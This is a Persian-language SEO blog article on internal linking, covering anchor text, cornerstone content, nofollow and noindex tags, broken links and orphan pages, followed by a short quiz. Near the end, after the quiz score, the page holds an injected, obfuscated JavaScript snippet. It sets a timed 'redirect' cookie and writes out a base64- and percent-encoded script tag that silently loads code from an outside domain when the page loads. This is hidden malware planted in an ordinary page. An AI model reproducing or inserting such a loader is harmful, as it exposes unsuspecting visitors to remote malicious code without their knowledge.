بدون دیدگاه
2019/12/01
1963 بازدید

 لینک داخلی چیست؟ چرا و چگونه internal links در سئو تاثیر می گذارد؟

پیش نیاز های مقاله

پس نیاز های مقاله

در مبحث سئو، هنگامی که نام ساخت لینک به گوشتان می خورد، قطعا فکر می کنید که منظور از این واژه، لینک سازی خارجی یا ساخت بک لینک است. چرا که لینک هایی که از سایت های دیگر به سایت ما ارسال می شوند، یک سیگنال قوی به موتورهای جستجو بوده که در افزایش رتبه جستجوهای ارگانیک از گوگل نقش به سزایی دارند.  اما مهمترین نوع لینک سازی، ساخت لینک داخلی می باشد. ساخت لینک های داخلی در صفحات مرتبط، باعث قوی تر شدن صفحه منبع شده و از نظر سئویی حائز اهمیت می باشد، به طوری که برای انتقال ROI ( نرخ بازگشت سرمایه) از لینک های خارجی، Internal links، نقش مهمی را  ایفا می کنند.

یادتان باشد، قبل از گرفتن رتبه برای محتوای خود، نیاز به لینک دارید. با استفاده از لینک های داخلی به گوگل اعلام می کنید که ساختار وب سایت چگونه است و کدام یک از صفحات، مهمتر هستند. با استفاده از استراتژی درست لینک سازی داخلی، می توان به بالا بردن رتبه سایت در گوگل کمک شایانی نمود. اگر به دنبال یادگیری بیشتر خودتان هستید، حتما به آزمون تستی سئو داخلی که درانتهای این مقاله گذاشته شده است، مراجعه نمایید.

لینک  داخلی (internal link) چیست؟

لینک های داخلی، هایپرلینک هایی (پیوندهایی) هستند که به صفحات داخلی همان دامنه (سایت)، اشاره می کنند. آن ها با لینک های خارجی  که به دیگر سایت ها در دامنه های مجزا اشاره می کنند، متفاوت می باشند. عکس زیر، نمونه ای از لینک سازی داخلی در سایت ویکی دمی می باشد:

نمونه ای از لینک سازی داخلی

ممکن است این سوال پرسیده شود که نمونه کد چنین لینک هایی، چگونه است و اگر بخواهیم به صورت دستی آن را ایجاد نماییم، باید از چه ساختاری استفاده نمود؟ برای آشنایی با نمونه کد لینک های داخلی، می توان عکس زیر را مشاهده کرد:

 

نمونه کد لینک داخلی

رایج ترین فرمت 

یکی از راه هایی که می توان با استفاده از اینترنال لینک ها به هدف مورد نظر رسید و حتی به تشخیص لینک داخلی هم کمک می کند، استفاده از کلمات توصیفی در انکر تکست (anchor text) می باشد. عموما انکر تکست ها، شامل کلمات مرتبط با  آن موضوع در

صفحه مبدا می باشند. استفاده از anchor text، مانند عکس  زیر، رایج ترین فرمت برای لینک سازی است.

نمونه انکرتکست در متن

 لینک سازی داخلی با سه هدف انجام می شود که  شامل موارد زیر می باشد:

 • لینک های داخلی به کاربران اجازه می دهند که صفحات سایت را بیشتر بررسی نمایند و مدت زمان ماندگاری در سایت هم بیشتر می شود.
 • اینترنال لینک ها، باعث می شوند که به صورت سلسله ای، اطلاعات در کل سایت پخش شود.
 • لینک سازی داخلی، قدرت رتبه بندی را به صورت اعتدال در کل سایت گسترش می دهد.

چرا لینک های داخلی برای گوگل (سئو) مهم هستند؟

عموما لینک های داخلی، به گوگل در پیدا کردن، ایندکس کردن یا فهمیدن تمامی صفحات روی سایت کمک می کنند. اگر برای ساخت  لینک داخلی، یک استراتژی عالی داشته باشید، می توانید اعتبار یک صفحه را به صفحات مهم انتقال دهید که این عمل به pagerank معروف است. به صورت خلاصه، internal links، برای تمامی سایت ها به عنوان کلیدی بوده که می خواهد بیشترین و بالاترین رتبه را در گوگل داشته باشند.

حال سوالی در اینجا مطرح می شود که  آیا گوگل با استفاده از لینک سازی، می تواند  مرتبط بودن محتوا در سایت را بفهمد و اینکه آن محتوا در سایت چه ارزشی دارد؟

در ادامه به آن ها پاسخ می دهیم.

ارتباط بین محتوا

گوگل با دنبال کردن تمامی لینک های داخلی و خارجی توسط ربات خود به نام گوگل بات (Googlebot)، می تواند کل سایت را خزش (crawl) نماید. ربات گوگل از صفحه اصلی وارد سایت می شود و به اولین لینکی که میرسد، آن را دنبال می کند. با دنبال کردن لینک ها، گوگل می تواند ارتباط تمامی صفحات، نوشته ها و پست ها را بفهمد. با این روش است که گوگل می تواند بفهمد که کدام یک از صفحات دارای موضوعات مشابه هستند. در ابتدای مقاله می بینید که کلمه ” بک لینک”  دارای لینک بوده که به گوگل اعلام می کند که این صفحه هم دارای مطالب مشترکی با آن صفحه دارد.

ارزش لینک

بعد از آشنایی با مفهوم ارتباط بین محتوا، حالا باید بدانید که گوگل ارزش لینک را بین تمامی لینک های موجود در یک صفحه تقسیم می کند. عموما صفحه اصلی یک سایت دارای ارزش لینک بیشماری بوده که تمامی این ارزش ها به خاطر وجود بک لینک هایی است که برای این صفحه ایجاد شده است.  اغلب، ارزش لینک بین تمامی لینک هایی که در صفحه اصلی وجود دارد، به اشتراک گذاشته می شود. به طوری که، ارزش لینکی که به آن لینک در صفحه اصلی داده شده است، مجددا بین تمامی لینک هایی از آن صفحه هم تقسیم می شود. به عبارتی دیگر، لینکی که در صفحه اصلی بوده، خود دارای یک صفحه مجزا با کلی لینک داخلی است، به طوری که ارزش دریافتی بین لینک های همان صفحه تقسیم می شوند. 

حال اگر صفحات شما در homepage، دارای لینک هایی باشد، به راحتی تمامی صفحات دارای ارزش خواهند بود و گوگل سریعتر می تواند محتواهای تازه نوشته شده را پیدا نماید و آن ها را ایندکس نماید. با استفاده از لینک سازی داخلی، رتبه صفحه بیشتر شده و امکان نمایش آن صفحه در organic search نیز بیشتر می شود.

 

مناسب ترین تعداد لینک در لینک سازی

تعداد لینک‌های داخلی برای هر سایت باید محدود باشد. توجه کنید که اعتبار یک سایت بین تمام لینک های داخلی آن تقسیم میشود و هر چه تعداد لینک‌ها بالاتر باشد طبیعتا ارزش هر لینک داخلی پایین‌تر خواهد آمد. در سئوی سایت باید توجه کنید که هیچ کاری را به صورت غیر طبیعی و اسپم نباید انجام داد مثل ساخت لینکسازی های داخلی برای یک وبسایت .

در کجاها لینکسازی داخلی انجام دهیم؟

قرار دادن لینک در متن

  ساخت بک لینک پروفایلی | خرید بک لینک پروفایلی

رایج ترین مکان برای قرار دادن لینک های داخلی درون محتوای متنی است و می دانیم که با کلیک روی آنها چه اتفاقی می افتد. در حالت ایده آل ، متنی که پیوند خود را در آن قرار می دهید باید مستقیماً با محتوای صفحه پیوند خورده مرتبط باشد. لینکی که درون متن قرار داده میشود توسط انکرتکست های متنوع پیوند میخورد. انکرتکست ها باید کلمات کلیدی هدف همان صفحه مقصد شما باشد و یا از کلمات کلیدی LSI باشد.

لینک مطالب مرتبط یا محبوب ترین ها انتهای صفحه

پیوند دادن به مقاله های مرتبط در پایین صفحه به صورت فهرست وار باید بخشی از هر سایتی باشد. با ایجاد لینک های مرتبط و همچنین محبوب ترین مطالب یا تازه ترین مطالب در یک صفحه هم لینک سازی داخلی ان صفحه را تقویت کردید و یک صفحه داینامیک ساخته اید و هم زمان ماندگاری کاربر و چرخش در وبسایتمان را افزایش میدهیم. ترجیحاً این بخشها را در نوار کناری یا پاورقی وب سایت خود ایجاد کنید تا در همه صفحات و پست ها نمایش داده شود.

راه اندازی یک استراتژی عالی برای لینک سازی داخلی

برای سئوی سایت بسیار حیاتی و مهم است که استراتژی لینک سازی داخلی را ارزیابی و بهبود دهید. با استفاد درست از لینک های داخلی، گوگل می تواند موارد زیر را بهتر بفهمد:

 • مرتبط بودن صفحات 
 • ارتباط بین صفحات
 • ارزش صفحات

ساختار لینک سازی در سایت

بهترین ساختار ایده آل برای سایت

تصور هرمی بودن سایت، یکی از ایده آل ترین ساختارها برای ایجاد یک سایت است. می توان در بالای هرم، صفحه اصلی سایت و در قسمت های پایین تر، بخش ها و طبقه بندی های مختلف سایت و در قسمت های پایین تر هرم، پست ها و صفحات تک و….  را در نظر گرفت. اگر سایت را بدین شکل طراحی نمایید، منوی سایت هم باید از چنین ساختاری پیروی نماید. در مقالات آینده درباره ساختار ایده آل سایت بیشتر صحبت خواهیم کرد.

محتوای کرنر استون

مهمترین محتوای سایت کدام است؟

بعد از طراحی سایت، نوبت به مشخص کردن مهمترین محتوای سایت می رسد که در ابتدا باید آن را مشخص نمایید. در صورتی که در انتخاب مهمترین محتوای خود شک دارید می توانید مقاله cornerstone content را مطالعه نمایید. شناخت مهمترین محتوای سایت،   به عنوان هسته بیزینس و کسب و کار، به حساب می آید. چرا که، با چنین محتوایی باید بتوانید محصول خود را بفروشید و یا با جستجوهای کاربران، آن محتوا  را در نتایج جستجو مشاهده نمایید.

برای آن که به گوگل بفهمانید که این محتوا بسیار مهم  است، باید لینک های داخلی زیادی به آن تزریق نمایید. نقاط مختلفی وجود دارد که می توان به محتوای کرنر استون، لینک داد. در ادامه بهترین راهکارهایی که می توان به محتوای مهم، لینک داد را به شما معرفی می کنیم.

فقط نکته ای که باید به یاد داشته باشید این است که بدون لینک های داخلی، محتوا نمی تواند rank بگیرد. با استراتژی لینک داخلی، می توان نشان داد که کدام یک از محتوا ها مرتبط و کدام یک از آنها دارای ارزش بیشتری هستند. برای افزایش رتبه سایت خود، بهتر است که از رفتار کاربران و فاکتورهای مهم برای رتبه بندی استفاده نمایید.

حالا نوبت به معرفی مهمترین راهکارها می رسد، برای آموزش لینک سازی داخلی، با ویکی دمی همراه باشید.

دو روش اصلی در لینک سازی داخلی

یکی از رایج ترین اصول لینک سازی های داخلی صفحات با استفاده از انکرتکست های مرتبط با صفحه هدف ما می باشد. شما میتوانید با این روش به دو طریق برای interlinks ها عمل کنید .

روش اول: با ایجاد یک مقاله جدید سعی کنید از آن به مقاللات قدیمی و مهم سایت خود لینک دهید. برخی اعتقاد دارند این روش چندان چندان مفید نخواهد بود چرا که هنوز صفحه جدید ما دارای ارزش و اعتبار نمی باشد اما باید این نکته را بدانید که این روش به بهود تجربه کاربری سایت ما کمک میکند و صفحات قدیمی تر ما بار دیگه توسط خزنده های گوگل ایندکس میشود . با اینکار شما توانسته اید مقالات قدیمی خود را داینامیک نگه دارید .

روش دوم: یکی از روش های پر قدرت در لینک سازی های درون یک سایت، لینک دهی از مقالات قدیمی و رتبه دار به مقالات جدید وبلاگ است. در این روش شما باید ابتدا با روش  کلمه کلید / اسم آدرس:sit مقالات و محتواهای رتبه دار خود را پیدا کنید و سپس در لینک سازی مقالات جدید از آنها استفاده کنید. با این دو روش شما می‌توانید لینک سازی داخلی قدرتمندی داشته و مقالات جدید خود را به خوبی در SERP رشد دهید.

آموزش لینک سازی داخلی

اضافه کردن لینک ها به محتوای متنی

زمانی که شما مقالات متنوعی با موضوعات خاص می نویسید، برای این که به گوگل و کاربران، آن را نشان دهید نیاز دارید که از لینک هایی در محتوای متنی خود به کار برید. برای گذاشتن لینک در محتوا یا می توانید با انکرتکست در داخل متن یا با گذاشتن لینک در انتهای متن، این کار را انجام دهید.

به هر حال شما می خواهید به گوگل، مقاله بنیادی را معرفی نمایید که مقالات دیگر به آن وابسته هستند، پس با استفاده از لینک سازی داخلی به آن مقاله خاص، لینک می دهید. نکته ای که نباید فراموش کنید این است که حتما از مقاله کرنر استون با یک کلمه کلیدی دیگر به همان محتوا لینک دهید تا لینک سازی دو طرفه انجام شود.

لینک های متنیاضافه کردن بخش جدید برای پست های مرتبط

یکی  دیگر از کارهایی که می توان برای لینک سازی داخلی انجام داد، استفاده از پست های مرتبط یا همان related post می باشد. برای این کار هم می توان از پلاگین و افزونه های متعددی استفاده کرد و هم می توان به صورت دستی، پست ها را در داخل متن ایجاد نمود.

اضافه کردن لینک های navigational یا پیمایشی

در کنار اضافه کردن بخش مجزا برای نوشته های مرتبط با مقاله، این امکان هم وجود دارد تا با استفاده از navigation links، اعتبار cornerstone content را افزایش دهید. شما می توانید در صفحه اصلی، با استفاده از لینک ها و دکمه و… به مقالات اصلی سایت لینک دهید؛ با این کار آن نوشته ها یا صفحات از دید گوگل قوی تر به نظر میرسند.

اضافه کردن لینک به taxonomies

منظور از تاکسونومی ها، همان دسته بندی ها و برچسب هایی هستند که برای سازماندهی کردن سایت و کاربران سایت مورد استفاده قرار می گیرند و گوگل هم با استفاده از آن ها، درباره محتوای شما اطلاع پیدا می کند. در صورتی که در سایت خود مجله یا همان بلاگ دارید، حتما از internal link ها را به تاکسونومی های متعلق به آن  نوشته یا صفحه بدهید. شما با استفاده از لینک سازی که به category و tag ها می دهید، با این کار به گوگل ساختار سایت و blog را نشان می دهید؛ بنابراین کاربران با این روش، راحت تر می توانند به اطلاعات سایت شما دسترسی داشته باشند.

اضافه کردن لینک داخلی به آخرین نوشته ها یا محبوب ترین ها

آخرین بخشی که می توان برای سایت خود لینک سازی انجام داد، دادن لینک داخلی به نوشته های محبوب یا همان popular post و آخرین نوشته است. این مطالب به صورت بخش مجزا در sidebar یا در فوتر سایت قرار میگیرد و در تمامی صفحات و نوشته ها دیده می شود. ارزشی که این لینک ها میدهند، باعث افزایش و بالا بردن سایت در نتایج گوگل می شود؛ چرا که ترافیک زیادی به خاطر ساختار درست سایت و در دسترس بودن محتوا ایجاد می شود و  همچنین سیگنال مثبتی به گوگل انتقال داده می شود.

لینک های داخلی بیشتر

به جز مواردی که در بالا گفته شد که همه لینک ها فالو بودند، نوع دیگری از لینک ها هستند که نوفالو می باشند. مانند:

لینک های Nofollow

بعضی از لینک های موجود در سایت، برای ما دارای اعتبار نمی باشند و ما هم نیاز نداریم که گوگل به آنها رتبه دهد مانند صفحه لاگین که نیاز نیست رتبه ای در گوگل داشته باشد. برای این کار باید از تگ نوفالو به هنگام لینک سازی استفاده نمایید. ظاهرا به نظر می رسد که ارزش لینک های نوفالو به لینک هایی که فالو هستند انتقال داده می شود.

نکته:

استفاده از nofollow tag، بدین معنی نیست که در نتایج جستجو پیدا نشود.در صورتی که نمی خواهید صفحات یا نوشته ها در نتایج دیده نشود، می توانید از تگ noindex استفاده نمایید.

امیدوارم این مقاله توانسته باشد، به سوالات شما پاسخ دهد، در صورت داشتن هرگونه سوالی برای ما پیغام بگذارید.

 

  انکر تکست چیست؟ تاثیر anchor text در سئو

نحوه ساخت لینک داخلی

 

مهمترین نکات کلیدی در لینک سازی های داخلی

جایگاه لینک سازی در صفحه

یکی از نکات طلایی در لینک سازی یک صفحه ، جایگاه لینک های داخلی است. توصیه میشود با قرار دادن لینک های داخلی در 100 کلمه ابتدایی و انتهایی یک صفحه احتمال انتقال ارزش از آن به صفحه مقصد بیشتر خواهد شد. البته توجه کنید بدون در نظر گرفتن تجربه کاربری و تنها با هدف انتقال ارزش و اعتبار ممکن است کاربر دیگر مقاله را تا اننها نخوند و بانس ریت سایت شما افزایش یابد.

میزان اعتبار صفحه

هر چه اعتبار و قدرت یک صفحه محتوا بیشتر باشد، ارزش بیشتری را به هنگام لینکسازی به صفحات مقصد منتقل می کند. برای مثال ارزش لینک های داخلی محتوایی با 3 هزار کلمه و بازدید بالا خیلی بیشتر از همان لینک در محتواهای کوتاه است. پس کنید در استراتژی محتوایی خود جذابیت و کاربر پسند بودن محتواها را در نظر بگیرید تا تمام صفحات اعتبار بالایی دریافت کنند.

نکته

 لینک سازی های زیاد به صفحاتی که در برنامه سئو هدف ما نیستند نباید در لینک سازی های داخلی ارزش و اهمیت زیادی پیدا کنند. درنتیحه به جای آنکه در صفحات یک سایت به بخش های کم اهمیت لینک سازی کنیم ، به صفحاتی که کاملا با موضوع صفحه و و اولین ما برای کسب رتبه در نتایج گوگل است لینک سازی کنیم.

استفاده از انکرتکست های مختلف

یکی از حرفه ترین نکات کلیدی در اصول لینکسازی داخلی استفاده از انکرتکست های متعدد از یک کلمه کلیدی است. تا چند سال اخیر همه بر این باور بودند که در ساخت لینک داخلی یک صفحه باید تنها از کلمه کلیدی آن استفاده کنیم. اما این روش کاملا منسوخ شده چرا که گوگل حرکت ما رو ربات گونه و اسپم در نظر میگیرد. برای مثال اگر قصد دارید برای صفحه آموزش سئو لینکسازی داخلی انجام دهید باید از انکرتکست های زیر هم استفاده کنید:

 • بهترین آموزش سئو
 • آموزش سئو حرفه ای
 • صفر تا صد آموزش سئو
 • آموزش سئو در تهران

رفع لینک های داخلی شکسته

لینک های شکسته به لینک های گفته میشود که بعد از کلیک بر روی آنها صفحه رو بدون محتوا مشاهده میکنیم. در این هنگام کاربر با مراجعه به این صفحات با خطای 404 رو به رو میشود. لینک های داخلی شکسته یا بر اثر تغییر آدرس صفحه و یا حذف یک صفحه در سایت به وجود میاد. به همین دلیل باید در ساخت لینک های داخلی حواسمان به این نوع صفحات بدون محتوا با خطای 404 نیز باشد. برای رفع مشکل لینک های شکسته در سایت باید صفحه های 404 را به مرتبط ترین صفحه یا صفحه اصلی سایت ریدایرکت کنید.

لینک سازی دسته بندی ها

در سایت های فروشگاهی ارزش لینک های داخلی به صفحات دسته بندی به شدت افزایش پیدا میکنه چرا که این صفحات به عنوان یک شاه راه اصلی قدرت و اعتبار را بین صفحات محصول و محتواهای کوچکتر انتقال میدهد. پس هر چه قدرت صفحات دسته بندی افزایش یابد احتال افزایش رتبه صفحات محصولات یک سایت نیز افزایش می باید.

پلاگین های ساخت لینک داخلی

در سایت های وردپرسی برای هر کاری که بخواهید افزونه و پلاگین تعرف شده است و شما قادر خواهید بود هر تغییری را با افزونه ها انجام دهید. ساخت internal link توسط افزونه لینک داخلی یکی از پلاگین های محبوب بین صاحبین سایت وردپرسی است. این پلاگین باتوجه به انکرتکست که ما مشخص میکنیم درون صفحه شروع به لینک سازی میکند اما توصیه میشود لینک سازی داخلی صفحات بلاگ خود را دستی انجام دهید تا با رعایت اصول لینک سازی صفحات اعتبار و ارزش بالایی دریافت کنند.

  الگوریتم رنک برین چیست؟

صفحات بدون لینک نسازید

در اصطلاح به صفحاتی که در لینک سازی داخلی به انها توجه ای نشده و هیچگونه لینکی در هیچ صفحه ای برای آنهها در نظر نگرفته ایم رو Orphan page می نامیم. وجود این گونه صفحات تاثیر خوبی در سئو سایت شما نخواهد داشت درنیتجه سعی کنید هیچ صفحه ای از سایت خود را بدون لینک داخلی رها نکنید.

ریدایرکت شدن لینک داخلی به صفحه

یکی از عمده مشکلاتی که پس از ریدایرکت کردن یک صفحه اتفاق می افتد، خطای 404 لینک های درون همان صفحه است. در واقع لینک‌هایی که از صفحات دیگر به این آدرس ها داده شده است را باید به روز رسانی کنید و به آدرس جدید ریدایرکت شده، لینک دهید تا از بروز خطای 404 جلوگیری شود.

لینک سازی بیش از حد به صفحات کم اهمیت

در هر سایتی یک سری محتوا وجود دارد که نسبت به بقیه‌ی محتواها اهمیت کمتری دارد و جزوه محتوهای اصلی و تاپ ما نیست. لینکسازی زیاد برای این صفحات، ارزش و اعتبار خاصی به سایت ما نخواهد داد و به جای آن باید سعی کنید تا به صفحاتی که محتوای غنی‌تر و بهتری دارند لینک دهید.

لینکسازی بیش از حد از صفحات مهم

برعکس اتفاق بالا نباید برای هر محتوا و پست های بلاگمان تعداد زیادی لینک درست کنیم، برای صفحات مهم سایت هم نباید بیش از حد لینک سازی داخلی انجام دهیم. لینک سازی های داخلی موجب انتقال اعتبار یک صفحه به صفحه دیگر خواهند شد. در نتیجه باید به این موضوع دقت کنید که چه صفحاتی ، چه محتواهایی برای شما اهمیت زیادتری دارند.

لینک سازی داخلی زیاد

همانطور که در بالا اشاره کردیم، هرچقدر لینک سازی داخلی در یک صفحه بیشتر باشد، کاربر تمایل کمتری به کلیک روی آن‌ها نشان می‌دهد و گوگل هم اعتبار کمتری برای هر کدام از آن لینک‌ها قائل می‌شود. اینجاست که اهمیت لینک سازی داخلی به صفحات مرتبط و هدفمند بیشتر جلوه پیدا می‌کند.

صفحات بدون لینک داخلی

یکی از اشتباهات رایج در بحث استراتژی لینک سازی داخلی این است که برای برخی صفحات یک وبسایت هیچگونه لینک سازی انجام نشده است. گوگل صفحاتی که هیچ لینک سازی داخلی ندارند را به عنوان صفحات یتیم یا Orphan page می‌شناسد و اعتبار کمی به آن محتوا خواهد داد. پس سعی کنید که حداقل از یک لینک داخلی در محتوای خود استفاده کنید.

 چند دستورالعمل وجود دارد که باید هنگام ایجاد هر پیوند داخلی رعایت کنید:

 • هیچگاه تنها برای اینکه یک لینک داخل صفحه تان داشته باشید سعی نکنید از محتوهای بی ربط حتما لینک سازی انجام دهید. در خیلی از موارد لینکسازی نکردن بهتر است ساخت لینک داخلی غیر مرتبط با همان صفحه.
 • در تعداد لینک هایی که میتوانید درون یک صفحه قرار دهید زیاده روی نکنید. یک یا دو پیوند داخلی درست و مرتبط اغلب می توانند تفاوت بزرگی ایجاد کنند.

 

آزمون تستی لینک سازی داخلی

/9
25

لینک سازی داخلی چیست؟

لینک های داخلی، هایپرلینک هایی (پیوندهایی) هستند که به صفحات داخلی همان دامنه (سایت)، اشاره می کنند. آن ها با لینک های خارجی، به دیگر سایت ها در دامنه های مجزا اشاره می کنند.

1 / 9

کدام مورد در لینک بیلدینگ داخلی موجب کاهش رتبه سئو سایت می شود؟

2 / 9

درمورد استراتژی لینک سازی داخلی کدام مورد اشتباه است؟

3 / 9

گوگل با استفاده از لینکسازی داخلی به چه مواردی پی نمی برد؟

4 / 9

لینک سازی داخلی با کدام هدف زیر انجام نمی شود؟

5 / 9

رایج ترین نوع لینک سازی داخلی کدام مورد زیر است ؟

6 / 9

برای اینکه گوگل اطلاعات یک صفحه را کرال کند تا به لینک های داخلی دسترسی داشته باشد ولی در صفحه نتایج نشان ندهد از چه دستوری استفاده میشود؟

7 / 9

در چه مواردی استفاده از تگ نو ایندکس کاربرد دارد؟

8 / 9

برای اینکه از ایندکس نشدن صفحات توسط ربات های گوگل مطمئن بشیم از کدام مورد استفاده می کنیم؟

9 / 9

کدام یک از انواع لینک سازی داخلی زیر دارای تگ Nofollow هستند؟

امتیاز شما

میانگین امتیازها 46%

0%

{var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

*
*

ده + دوازده =